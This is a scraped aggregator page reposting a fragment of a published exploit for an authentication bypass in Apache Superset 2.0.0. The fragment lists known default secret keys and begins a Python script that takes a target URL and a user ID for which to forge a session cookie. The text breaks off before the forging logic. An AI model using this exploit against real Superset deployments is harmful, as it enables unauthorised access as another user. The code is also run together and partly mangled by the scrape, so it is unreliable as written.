vimarsana.com
Home
Live Updates
Apache Superset 2.0.0 Authentication Bypass - KizzMyAnthia.c
Apache Superset 2.0.0 Authentication Bypass - KizzMyAnthia.c
Apache Superset 2.0.0 Authentication Bypass - KizzMyAnthia.com
# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass# Date: 10 May 2023# Exploit Author: MaanVader# Vendor Homepage: https://superset.apache.org/# Version: Apache Superset= 1.4.1b'thisISaSECRET_1234', # deployment templateb'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentationb'TEST_NON_DEV_SECRET' # docker compose]def main():parser = argparse.ArgumentParser()parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')args = parser.parse_args()try:u = args.url.rstrip('/')
Related Keywords
,
Macintosh ,
Exploit Title ,
Apache Superset ,
Exploit Author ,
Vendor Homepage ,
Intel Mac ,
Superset Version ,